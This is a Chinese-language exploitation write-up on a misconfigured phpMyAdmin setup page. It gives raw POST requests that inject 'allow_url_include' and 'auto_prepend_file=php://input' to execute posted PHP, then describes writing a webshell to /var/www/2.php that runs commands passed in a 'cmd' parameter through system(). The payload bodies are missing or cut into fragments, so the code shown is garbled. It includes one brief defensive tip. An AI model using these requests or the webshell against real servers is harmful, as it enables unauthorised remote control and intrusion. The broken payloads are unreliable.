# Phpmyadmin setup页面配置不当的利用姿势整合
==
一、漏洞简介
————
其安装在Web服务器上的接口界面,主要用于使用php来管理安装服务器上的后台数据库(MySQL数据库),但如果采用默认安装,敏感路径未做出处理,便会存在安全漏洞,最突出的是其setup脚本中存在着服务器端请求伪造漏洞。远程攻击者可利用该漏洞执行未授权的操作。
二、漏洞影响
————
phpMyAdmin
4.0.10.19之前的版本,4.4.15.10之前的4.4.x版本,4.6.6之前的4.6.x版本。
三、复现过程
————
如果用户未对phpmyadmin目录下的setup文件进行安全处理,那普通用户可以在不进行身份认证的情况下,便可以配置服务器信息(防范措施:不允许其他用户从公网访问phpMyAdmin目录或者禁止访问setup文件)![1.png](/static/qingy/Phpmyadmin_setup页面配置不当的利用姿势整合/img/rId24.png)我们可以通过构造参数执行配置指令,并利用php伪协议提交post内容执行
POST http://www.0-sec.org/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
#问号及其后面的内容用于修改修改php的主配置文件php.ini,从而可以执行下面插入的php代码
Host: www.0-sec.org
Content-Length: 35
可以使用Burpsuite的Repeater工具该发送post请求,获取目标的信息![3.png](./resource/Phpmyadminsetup页面配置不当的利用姿势整合/media/rId25.png)由刚刚的id命令得知目前的用户为www-data,由查看账户信息得知其主目录为/var/www,那么便可以向其主目录写入木马,以实现远程控制的效果![4.png](./resource/Phpmyadminsetup页面配置不当的利用姿势整合/media/rId26.png)![5.png](/static/qingy/Phpmyadmin_setup页面配置不当的利用姿势整合/img/rId27.png)命令如下
POST http://www.0-sec.org/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
Host: www.0-sec.org
Content-Length: 102
” >/var/www/2.php’);
#该木马表示将GET方式获取的指令赋值于cmd命令,并使用system()函数运行cmd变量存储的命令
#反斜杠作用:避免服务器将上传内容过滤,输入命令无效
die();
?>
通过在浏览器访问该木马,便可获取目标系统的shell![6.png](/static/qingy/Phpmyadmin_setup页面配置不当的利用姿势整合/img/rId28.png)
参考链接
——–
> https://louisnie.github.io/2018/10/23/%E6%89%8B%E5%8A%A8%E6%8C%96%E6%8E%98%E4%B9%8B%E9%BB%98%E8%AE%A4%E5%AE%89%E8%A3%85%E6%BC%8F%E6%B4%9E-1/
请登录后查看评论内容